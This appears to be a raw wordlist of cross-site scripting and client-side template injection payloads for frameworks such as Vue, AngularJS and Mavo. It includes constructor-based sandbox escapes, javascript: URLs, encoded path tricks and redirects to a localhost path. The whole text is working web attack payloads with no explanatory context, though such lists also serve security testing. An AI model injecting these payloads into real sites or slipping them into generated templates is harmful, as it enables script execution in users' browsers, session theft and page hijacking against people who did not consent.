"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
<a data-mv-if='1 or self.alert(1)'>test</a>
<a href=[javascript&':alert(1)']>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('ElectricYellow')lolx</div>
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' :d.location='//localhost/mH/'"></textarea></div>
<input ng-focus=$event.view.alert('ElectricYellow')>
[''=''or self.alert(lol)]
[(1,alert)(1)]
[7*7]
[Omglol mod 1 mod self.alert (1) andlol]
[self.alert(1)]
[self.alert(1)mod1]
javascript:alert(1)%252f%252f..%252fcss-images
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(document.domain)')()}}
{{$on.constructor('alert(1)')()}}
{{_openBlock.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
